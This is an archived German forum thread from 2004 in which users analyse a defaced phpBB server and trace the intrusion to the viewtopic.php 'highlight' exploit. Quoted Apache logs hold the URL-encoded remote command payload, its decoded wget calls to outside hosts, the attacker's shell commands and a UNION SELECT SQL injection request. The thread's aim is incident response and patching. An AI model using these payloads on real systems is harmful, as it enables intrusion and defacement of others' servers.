WCM Forum

WCM Forum (http://www.wcm.at/forum/index.php)
-   Linux, UNIX, Open Source (http://www.wcm.at/forum/forumdisplay.php?f=13)
-   -   Server gehacked (http://www.wcm.at/forum/showthread.php?t=151972)

Dumdideldum 02.12.2004 10:21

Server gehacked

Ein Bekannter von mir wurde von Boxocide und ESX heimgesucht.
boxocide

Er hat einen GNU/Linux Webserver laufen mit Apache 2.0.51 (php und mysql versionen sind mir zurzeit nicht bekannt) - basierend auf FC2.

Nachdem ich mir die Logfiles angesehen hab bin ich mir nicht sicher, wie die reingekommen sind.

Jedenfalls wurden im DocumentRoot der Hauptseite (phpBB basierend) die wichtigsten Files durch .html files ersetzt.
Daneben laufen noch einige kleine Seiten, die durch Virtualhosts betrieben werden - welche jedoch alle durch .htaccess vom public-Zugriff abgeschirmt werden.

Der Server wird sowieso komplett neu aufgesetzt, da meine Fähigkeiten nicht ausreichen, um wirklich alles zu checken.

Einen Rootkit-Checker hab ich schon ausgeführt, der hat nichts Verdächtiges gefunden.

Nach langer Sucherei in den Logfiles ist mir jedoch folgendes aufgefallen:
(aus der access_log von Apache):

Zitat:

69.93.x.xxx - - [02/Dec/2004:02:48:04 +0100] "GET /viewtopic.php?t=%32%30&rush=%65%63%68%6F%20%5F%53% 54%41%52%54%5F%3B%20%77%67%65%74%20%68%74%74%70%3A %2F%2F%77%69%6C%6C%79%73%62%69%72%74%68%64%61%79%2 E%63%6F%6D%2F%68%61%63%6B%65%64%2E%68%74%6D%6C%3B% 20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.% 70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45 %54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527 HTTP/1.1" 200 36025 "-" "-"
Das sieht mir etwas verdächtig aus - die Strings sind absolut untypisch.

Dann kommt das error_log:
Zitat:

--02:08:47-- http://www.xxxx.org/shk2.html
=> `shk2.html'
Resolving www.xxxx.org... 206.123.xx.xxx
Connecting to www.xxxxx.org[206.123.xx.xxxx]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 517 [text/html]
(xxxx ersetzt ;) )

Und:

Zitat:

mv: cannot stat `hacked.html': No such file or directory
Also haben die anscheinend shell access erreicht.

Desweiteren scheint es, als ob group, shadow usw. in /etc auch geändert wurden, da es mit dem Änderungsdatum der index-Files im DocumentRoot übereinstimmt.
Genaueres kann ich erst sagen, wenn ich den Serverbetreiber ausflaschel.

Kann man mit diesen Angaben eine ungefähre Aussage tätigen, wie die da reingekommen sind ?
Ist es möglich, über phpBB Schwachstellen shell access zu ergaunern ?

Wie gesagt, der Server wird komplett neu aufgesetzt und ich habe weder das Wissen, noch das Interesse das komplette System forensisch zu untersuchen.
Denn was ich finden werde (im Fall des Falles) bringt sowieso nix, da ich annehme, dass die so gscheit sind und ihre Spuren verwischt haben.

Vielen Dank für Tips

Sloter 02.12.2004 10:32

Läuft auch PHPNuke?

Sloter

Dumdideldum 02.12.2004 10:34

Zusatzfrage:
Soweit ich weiß bedeuten die %xx Angaben Strings - wie kann ich diese in Strings umwandeln sodaß ich genau sehe, was die für eine Syntax für viewtopic.php genutzt haben ?

Dumdideldum 02.12.2004 10:34

Zitat:

Original geschrieben von Sloter
Läuft auch PHPNuke?

Sloter

Nein, aber phpBB ist mit ein paar Hacks aufgeblasen :S

Edit:
http://www.heise.de/security/news/meldung/53511

Hmmm.

Sloter 02.12.2004 10:37

Gar nicht mal so alt.

PHPNuke auf einem anderen virtuellen Host?

Sloter

Dumdideldum 02.12.2004 10:40

Zitat:

Gar nicht mal so alt.

PHPNuke auf einem anderen virtuellen Host?

Sloter

Nein.
Alle anderen "Seiten" sind eher Admin-Tools, welche aber durch .htaccess abgesichert sind.
Und ich habe nirgends in den Logs einen Zugriff auf diese Seiten gesehen.
Ich gehe davon aus, dass ein Zugriff über phpBB statt gefunden hat.

Philipp 02.12.2004 10:59

Re: Server gehacked

Zitat:

Original geschrieben von Dumdideldum
69.93.x.xxx - - [02/Dec/2004:02:48:04 +0100] "GET /viewtopic.php?t=%32%30& rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20%77 %67%65%74%20%68%74%74%70%3A%2F%2F%77%69%6C%6C%79%7
3%62%69%72%74%68%64%61%79%2E%63%6F%6D%2F%68%61%63% 6B%65%64%2E%68%74%6D%6C%3B%20%65%63%68%6F%20%5F%45
%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75 %28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%7 2%75%73%68%5D%29.%2527 HTTP/1.1" 200 36025 "-" "-"

Vor allem dieser Teil ist interessant:
rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20%77 %67%65%74%20%68%74%74%70%3A%2F%2F%77%69%6C%6C%79%7
3%62%69%72%74%68%64%61%79%2E%63%6F%6D%2F%68%61%63% 6B%65%64%2E%68%74%6D%6C%3B%20%65%63%68%6F%20%5F%45
%4E%44%5F

Übersetzt man das mittels urldecode(), kommt folgendes zum Vorschein:

Code:

echo _START_; wget http://willysbirthday.com/hacked.html; echo _END_

Dumdideldum 02.12.2004 11:10

Hmmm,
also bedeuted das, dass besagte wget Aufrufe durch Mißbrauch der viewtopic.php stattgefunden haben ?

Also in Wahrheit nie shell access ergaunert wurde, sondern alle Befehle mittels viewtopic.php ausgeführt wurden ?

Alle besagten bösen viewtopic.php Gebräuche in der haha.txt.

Edit:
Hier ein paar "übersetzte" Befehle:
Zitat:

cat config.php na supi ;) :D
ls
pico shk2.html
wget http://willysbirthday.com/images/boxoesx.gif
mv hacked.html index.php
mkdir images
....
Ich möcht nicht wissen, wie oft ich dem Serverholder gepredigt hat, dass er niemals via root account mysql connecten sollte :D (config.php)
Najo, sei Schuld.

Und noch was gefunden:
Zitat:

"GET /privmsg.php?folder=savebox&mode=read&p=99&pm_sql_u ser=AND%20pm.privmsgs_type=-99%20UNION%20SELECT%%2020null,null,null,null,null, null,null,null,null,null,null,null,null,null,null, nul HTTP/1.1" 302

"GET /privmsg.php?folder=savebox&mode=read&p=99&pm_sql_u ser=AND%20pm.privmsgs_type=-99%20UNION%20SELECT%%2020null,null,null,null,null, null,null,null,null,null,null,null,null,null,null, nul HTTP/1.1"
Das hab ich schon mal gesehen, und zwar in einer Hacking Anleitung von phpBB. Also war phpBB die Schwachstelle - für was gibts Updates bitte? arghl

Zusatzfrage:
Die IPs sind natürlich gespeichert, eine ist klar zuordnungsbar, zwar eine dynamische IP aus Dallas, dennoch kein anon-proxy.
Spoofing sollte nicht möglich sein, da auf dem GNU/Linux server auch eine iptables firewall gelaufen ist.

Tjo, ich schätz mal dies als Musterbeispiel geltend zu machen, was passiert, wenn man ein Script benutzt, das fehleranfällig ist und vorallem, nicht upzudaten und deppat root details zu nutzen, um mysql auszuführen.

Irgend eine Chance, mit den IPs den Verursachern zumindest auf die Finger zu klopfen ?

Philipp 02.12.2004 11:27

Zitat:

Hmmm,
also bedeuted das, dass besagte wget Aufrufe durch Mißbrauch der viewtopic.php stattgefunden haben ?

Ja, einfach "phpbb highlight exploit" in Google eingeben.

Zitat:

Also in Wahrheit nie shell access ergaunert wurde, sondern alle Befehle mittels viewtopic.php ausgeführt wurden ?
Ja und Nein. viewtopic.php wurde verwendet, aber der Angreifer kann Shell Befehle samt Ausgabe (z.B. ls) mit den Rechten des Apache Users ausführen. Ein entsprechendes Perl Script ist im Umlauf.

Ich würde allen die phpBB einsetzen dringend raten auf phpBB 2.0.11 zu upgraden.

Dumdideldum 02.12.2004 11:30

Ich denke es wäre trotzdem ratsam, den Server komplett neu aufzusetzen?

Und diesmal mach ich es, dass nix mehr rooterei passiert :D

Philipp 02.12.2004 11:49

Zitat:

Ich denke es wäre trotzdem ratsam, den Server komplett neu aufzusetzen?
Kommt darauf an. Solange nur ein paar Dateien auf der entsprechenden Website hochkopiert wurden besteht eigentlich kein Grund zum Neuaufsetzen.

Ganz anders wäre es wenn jemand echten root Zugang erlangt.

Zitat:

Und diesmal mach ich es, dass nix mehr rooterei passiert
Und nicht vergessen den PHP Safemode zu aktivieren ;)

Zitat:

Irgend eine Chance, mit den IPs den Verursachern zumindest auf die Finger zu klopfen ?
abuse@seinprovider

Dumdideldum 02.12.2004 11:52

Zitat:

Original geschrieben von Philipp
Kommt darauf an. Solange nur ein paar Dateien auf der entsprechenden Website hochkopiert wurden besteht eigentlich kein Grund zum Neuaufsetzen.

Das kann ich erst nach Rücksprache mit dem Serverholder machen - keine Ahnung was der da in letzter Zeit aufgeführt hat.

Zitat:

Ganz anders wäre es wenn jemand echten root Zugang erlangt.
Muß ich erst mal nachschauen, hab gestern um Mitternacht das erste Mal ein bisserl geschnüffelt.
Tipp, wie ich das bewerkstelligen sollte?
In der bash_history find ich nix.

Zitat:

Und nicht vergessen den PHP Safemode zu aktivieren ;)
Hoffe, der ist an. Ich habs jedenfalls mal eingeschaltet. Aber keine Ahnung :lol:
Leute editen gern .ini und /etc files :lol:

Zitat:

abuse@seinprovider
Erfolgsaussichten: Null
Aber dennoch, was wäre in so einer Mail einzufügen, um wirklich etwas in der Hand zu haben?
Leider erscheint eine IP dynamisch zu sein, von der anderen kann ich (noch) nix sagen.
Also Datum+Uhrzeit der Tätigkeiten plus copy&paste der Logs ?

Thx

Edit:
Und darüberhinaus, waren das überhaupt Profis?
Weil so deppert sein und solche Spuren hinterlassen :S

Philipp 02.12.2004 12:24

Zitat:

Tipp, wie ich das bewerkstelligen sollte?
Ich würde mir erst mal ansehen welche Befehle über viewtopic.php ausgeführt wurden

Zitat:

Erfolgsaussichten: Null
Kommt auf den Provider an. Die meisten US Provider nehmen solche Hackangriffe aber ziemlich ernst.

Ist 69.93.x.xxx der IP Bereich des Angreifers? Dieser IP Bereich gehört zu www.theplanet.com bzw. www.servermatrix.com. Der Angriff wurde in diesen Fall von einen Dedizierten Server ausgeführt der möglicherweise auch gehackt wurde. Ich würde auf jedenfall eine Email an abuse@theplanet.com schicken, da The Planet diese Emails tatsächlich liest.

Zitat:

Aber dennoch, was wäre in so einer Mail einzufügen, um wirklich etwas in der Hand zu haben?
Einen Auszug des Serverlogs als Attachment, z.B. mittels cat access.log | grep 69.93 > hacklog.txt

Ein cat access.log | grep rush sollte übrigens alle viewtopic.php Hackversuche zeigen.

Dumdideldum 02.12.2004 13:23

thx für deine Hilfe phillip.

Ich hab die IP Range schon ausfindig gemacht, kontaktiere aber zurzeit andere Betroffene, sodaß wir das Abuse Senden koordinieren, dass der Provider dies nun wirklich ernst nimmt.

Alle relevanten log Einträge hab ich schon mit grep gefiltert.

BTw:
hab es jetzt lokal probiert mit phpBB 2.0.7 --->
es ist unglaublich einfach :S

Also bitte alle auf 2.0.11 upgraden !

Update:
Es scheint als ob der Angriff von einem gehackten dedicated Gameserver gestartet wurde.
uffff.

Philipp 02.12.2004 23:42

Bei The Planet werden solche Meldungen normalerweise gleich ernst genommen und untersucht. Diese Server werden dann meistens vom Netz genommen und der Betreiber muss einen Serverrestore für $75 machen bevor der entsprechende Server wieder angeschlossen wird.

Sloter 03.12.2004 08:14

Ich finde leider die Mails nicht mehr.
Aber vor 3-5 Monate hat ein Server von ThePlanet eine mir bekannte Maschine attackiert und ThePlanet hat es nicht die Bohne interressiert.

Wenn du dich auf der Maschine vom Angreifer umsiehst, findest du ein verzeichnis mit allmöglichen Hackertools und Scripten die Exploits ausnützen.

Vielleicht sollte man ThePlanet in arabisch anschreiben, das sie reagieren :D

Sloter

Dumdideldum 03.12.2004 09:07

dann borgst mir aber deine mail addy :D

artemisia 03.12.2004 10:45

Zitat:

Vielleicht sollte man ThePlanet in arabisch anschreiben, das sie reagieren :D

Sloter

jösses, jösses ...

guter anfang honey ;-)

artemisia

(sry, wegen ot)

Philipp 03.12.2004 12:30

Zitat:

Ich finde leider die Mails nicht mehr.
Aber vor 3-5 Monate hat ein Server von ThePlanet eine mir bekannte Maschine attackiert und ThePlanet hat es nicht die Bohne interressiert.

Wurde der Server nicht vom Netz genommen? Eine Email Bestätigung gibt es meistens nicht. Sämtliche Beschwerden werden aber trotzdem untersucht.

Sloter 03.12.2004 14:01

Nö, Server wurde nicht vom Netz genommen.
Leider finde ich die Mails nicht mehr, Imho war es sogar die selbe Maschine.

Schau dich um auf der Maschine, man findet sehr leicht das Verzeichnis mit der Software.

@dumdideldum
Feigling, es genügen ein paar Wörter.
Ahmed dankt ServerPlanet für die Unterstützung im Kampf gegen den Imperialismus :D

Sloter

Dumdideldum 03.12.2004 14:18

Zitat:

Schau dich um auf der Maschine, man findet sehr leicht das Verzeichnis mit der Software.

Meinst du jetzt den Server vom Angreifer ?
Wenn ja, her mit den Verzeichnissen. Ein Ratespiel ist schon heftig.

Zitat:

@dumdideldum
Feigling, es genügen ein paar Wörter.
Ahmed dankt ServerPlanet für die Unterstützung im Kampf gegen den Imperialismus :D

Sloter

:D

frazzz 03.12.2004 14:25

endlich mal ein sehr interessanter thread :)

btw: wenn der angreifer schon seine tools anbietet, so nutze sie doch :hehe:

Sloter 03.12.2004 14:34

@frazzz
Die Tools und Scripten findest du leicht im Netz.

@dumdideldum
Ich kann dir keine Anleitung geben, das wäre nicht legal ;-)

Du hast doch einen wget in deinen Logs.
Laß das wget weg und gib das ganze in den Browser ein, ohne abschließenden Dateiangabe.
http://www.domain.com/verzeichnis/

Sloter

frazzz 03.12.2004 14:35

Zitat:

@frazzz
Die Tools und Scripten findest du leicht im Netz.

Zitat:

was jetzt? ;)

Dumdideldum 03.12.2004 14:49

@sloter:
Ich weiß noch immer nicht, welchen Server du genau meinst, pm ;)

Nach erneuter Dursicht der Logs bin ich mir nicht mehr so sicher, ob dies ernst zu nehmende Hacker waren.
Sieht viel mehr nach l33t h4xx0r aus :D

Zitat:

ls
cat config.php
ls
rm -R -f sigs
ls
wget www.ghosn.org/shk2.html
ls
pico shk2.html
cat shk2.html
wget http://willysbirthday.com/hacked.html
wget http://willysbirthday.com/images/boxoesx.gif
mv hacked.html index.php
mkdir images
mv boxoesx.gif /images
mv boxoesx.gif images/
wget www.ghosn.org/shk2.swf
ls
Das ein Auszug aus den Befehlen, die sie getätigt haben.
Eben zwei bringen mich zur Annahme, dass eher dodln am Werk waren:
1) pico shk2.html
Seit wann ist es möglich, pico über einen Browser zu bedienen ?
2) cp boxoesx.gif /images
Hamma vergessen dass man nicht im / ist?

frazzz 03.12.2004 14:57

Zitat:

@sloter:
Ich weiß noch immer nicht, welchen Server du genau meinst, pm ;)

Nach erneuter Dursicht der Logs bin ich mir nicht mehr so sicher, ob dies ernst zu nehmende Hacker waren.
Sieht viel mehr nach l33t h4xx0r aus :D

Das ein Auszug aus den Befehlen, die sie getätigt haben.
Eben zwei bringen mich zur Annahme, dass eher dodln am Werk waren:
1) pico shk2.html
Seit wann ist es möglich, pico über einen Browser zu bedienen ?
2) cp boxoesx.gif /images
Hamma vergessen dass man nicht im / ist?

der srv, dessen ip du in deinen logs findest :rolleyes:

denk ich auch, das es kiddies waren.
ernstzunehmen, ja. immerhin konnten sie eindringen, also passt was nicht.

Dumdideldum 03.12.2004 15:07

Zitat:

Original geschrieben von frazzz
der srv, dessen ip du in deinen logs findest :rolleyes:

huh ?
Das ist kein WWW server, sondern, wie bereits geschrieben, ein gameserver.

Insofern bringt mir http Nüsse.

frazzz 03.12.2004 15:10

Zitat:

Das ist kein WWW server, sondern, wie bereits geschrieben, ein gameserver.

ist doch egal, wozu der server dient(e)
du findest ein verzeichnis mit der hackersoftware ;)

Zitat:

Wenn du dich auf der Maschine vom Angreifer umsiehst, findest du ein verzeichnis mit allmöglichen Hackertools und Scripten die Exploits ausnützen.

Philipp 03.12.2004 16:15

Zitat:

Es ist sehr unwahrscheinlich das es die gleiche Machine ist. The Planet ist ein relativ grosser Provider mit mehreren Rechenzentren und tausenden von Servern.

Das dort monatelang der gleiche Server als Hackmachine verwendet wird, kann ich mir irgendwie nicht vorstellen. Ich kenne The Planet wirklich sehr sehr gut... ;)

http://uptime.netcraft.com/up/graph?...majorgeeks.com

Der zweite Total Control Server wird in Kürze bestellt und ersetzt meine derzeitige Dual Xeon Machine bei EV1/Rackshack :)

Sloter 03.12.2004 18:48

Ich guck Morgen nocheinmal nach in meinem Mailarchiv.
Ich kann mich nur auf die Domain erinnern willysbirthday.com.

Ich kann mir aber schon vorstellen das es die Burschen von ThePlanet nicht sonderlich interressiert.
Das anbieten von Tools und Scripten ist nichts verwerfliches und wo bitte soll Österreich sein?

Wir werden ja sehen, wie lange die Maschine von der Dumdideldum angegriffen wurde, online ist.
Bis jetzt schaut es nicht danach aus, als würde sie offline gehen.

Sloter

Philipp 03.12.2004 19:49

Zitat:

Ich kann mich nur auf die Domain erinnern willysbirthday.com.
Diese ist aber auf einen BTN / CIAS Internet server gehostet:
http://uptime.netcraft.com/up/graph?...ysbirthday.com

Zitat:

Ich kann mir aber schon vorstellen das es die Burschen von ThePlanet nicht sonderlich interressiert.
Selbst die kleinste Brute Force Attacke interessiert sie:
http://forums.servermatrix.com/viewt...10957&start=54

Das gleiche übrigens auch bei http://www.ev1servers.net.

Sloter 03.12.2004 20:33

Ein Brutforce ist auch etwas anderes, als ein Download von ein paar Scripten zum Testen ob der eigene Server dicht ist.

Obwohl nach der letzten Rechtsprechung in D, ist ein Brutforce keine Straftat.
Man kann sich ja einmal bei der IP verhauen, eigentlich wollte man am eigenen Server sich einlogen.

So wie ich die Amis kenne, werden sie einem eigenen Patrioten nur etwas tun, wenn die Beschwerde auch von einem Ami kommt.
Ansonst, wo ist eigentlich Österreich.

Sloter

Philipp 03.12.2004 21:29

Zitat:

Ein Brutforce ist auch etwas anderes, als ein Download von ein paar Scripten zum Testen ob der eigene Server dicht ist.
Wieso Download von Scripten? Der "The Planet" Server wurde als Hackwerkzeug missbraucht um über das phpBB exploit in die anderen Server einzubrechen. Das sieht man im geposteten Log auf der ersten Seite.

Zitat:

Man kann sich ja einmal bei der IP verhauen, eigentlich wollte man am eigenen Server sich einlogen.
Das war ein Beispiel das selbst der Versuch in einen Server einzubrechen schon vom Abuse Team untersucht wird. Unter Bruteforce Attacke verstehe ich aber mehrere Einlogversuche mit unterschiedlichen Logins innerhalb weniger Sekunden.

frazzz 03.12.2004 21:54

ein brutforce dient imho zu erlangung eines root(su, admin)-pwd, also ist der login bekannt oder zum hacken einer verschlüsselung.

=> rc5 afaik auch ein bruteforce

Sloter 03.12.2004 21:59

Zitat:

"The Planet" Server wurde als Hackwerkzeug missbraucht um über das phpBB exploit in die anderen Server einzubrechen. Das sieht man im geposteten Log auf der ersten Seite.

Das war ein Beispiel das selbst der Versuch in einen Server einzubrechen schon vom Abuse Team untersucht wird.

Unter Bruteforce Attacke verstehe ich aber mehrere Einlogversuche mit unterschiedlichen Logins innerhalb weniger Sekunden.

1, Was siehst du da?
Das jemand auf einen öffentlichen Service zugeriffen hat.
Wenn das nicht erwünscht ist, das jemand von Aussen zugreift, warum wird dann der Dienst frei gegeben?

2, Yep, wenn sich ein Ami beschwert.

3, Ich auch, aber das ich mir die tägliche Arbeit ersparre, verwende ich ein Script zum einlogen.
Ich kann jetzt gar nicht erklären, warum das Script irre gelaufen ist, ich wollte mich nur auf meinem Server einlogen.

Apropo, der Server ist noch immer online und ich verwette eine kostenlose .info das er online bleibt ;-)

Sloter

Philipp 03.12.2004 23:25

Zitat:

1, Was siehst du da?

Das da:
69.93.x.xxx - - [02/Dec/2004:02:48:04 +0100] "GET /viewtopic.php?t=%32%30& rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20%77
%67%65%74%20%68%74%74%70%3A%2F%2F%77%69%6C%6C%79%7
3%62%69%72%74%68%64%61%79%2E%63%6F%6D%2F%68%61%63%
6B%65%64%2E%68%74%6D%6C%3B%20%65%63%68%6F%20%5F%45
%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75
%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%7
2%75%73%68%5D%29.%2527 HTTP/1.1" 200 6025 "-" "-"

Diese Anfrage wurde mittels eines im Umlauf befindlichen Perl Scripts generiert, welches es erlaubt beliebige Shell Befehle über phpBB 2 auszuführen.

Zitat:

2, Yep, wenn sich ein Ami beschwert.
Ich würde es aber dennoch vermeiden Raubkopien meines CMS System auf einen The Planet Server zum Download anzubieten :ms:. Die letzte Beschwerde kam ohne Probleme durch.

Zitat:

3, Ich auch, aber das ich mir die tägliche Arbeit ersparre, verwende ich ein Script zum einlogen.
Ich kann jetzt gar nicht erklären, warum das Script irre gelaufen ist, ich wollte mich nur auf meinem Server einlogen.

Du loggst dich in 50 Accounts gleichzeitig ein z.B. admin/admin oder www-data usw. ;)

Zitat:

Apropo, der Server ist noch immer online und ich verwette eine kostenlose .info das er online bleibt ;-)
Nur eine? Nicht 25 :D

Hat Dumdideldum den Server überhaupt gemeldet? Je nach Situation kann es auch durchaus sein das er online bleibt.

Möglichkeit #1
Der Server selber wurde kompromitiert

In diesen Fall wird er vom Netz genommen und muss neu installiert werden. Ein Reimage der Platte kostet $75 und einige Stunden Downtime. Sobald der Server clean ist wird er wieder angeschlossen.

Möglichkeit #2
Der Kunde einer Webhostingfirma die diesen Server gemietet hat spielt Script Kiddy oder Spammer

In diesen Fall bekommt der Serverbetreiber ein Trouble Ticket von der Abuse Abteilung das er innerhalb 24 Stunden beantworten sollte. Wenn er koopieriert, wird beim ersten Mal noch ein Auge zugedrückt.

Philipp 04.12.2004 00:51

Zitat:

BTw:
hab es jetzt lokal probiert mit phpBB 2.0.7 --->
es ist unglaublich einfach :S

Also bitte alle auf 2.0.11 upgraden !

Interessant: Mein Ubuntu Linux 4.10/VHCS 2.2 Testserver scheint trotz älterer phpBB 2 Version immun gegen dieses Exploit zu sein. Die entsprechenden Einträge findet man aber im Serverlog.

Welche PHP Version/OS verwendest Du auf deiner lokalen Installation?

colossus 05.12.2004 01:23

Zitat:

pico shk2.html
EINDEUTIG Kiddies. ;> :D

Dumdideldum 08.12.2004 09:18

Zitat:

Interessant: Mein Ubuntu Linux 4.10/VHCS 2.2 Testserver scheint trotz älterer phpBB 2 Version immun gegen dieses Exploit zu sein. Die entsprechenden Einträge findet man aber im Serverlog.

Welche PHP Version/OS verwendest Du auf deiner lokalen Installation?

PHP 4.3.9-1
MySQL 4.0.22
Apache 2.0.52
Debian SID

Abuse Mail gesendet, damit ist das Problem für mich erledigt.

dareel 09.12.2004 10:13

falls noch interesse besteht

der bug wird hier beschrieben, zumindestens hört es sich genau nach deinem prob an.

och, steht doch schon alles auf der ersten seite :D, wieder mal zu langsam ;)

Alle Zeitangaben in WEZ +2. Es ist jetzt 01:20 Uhr.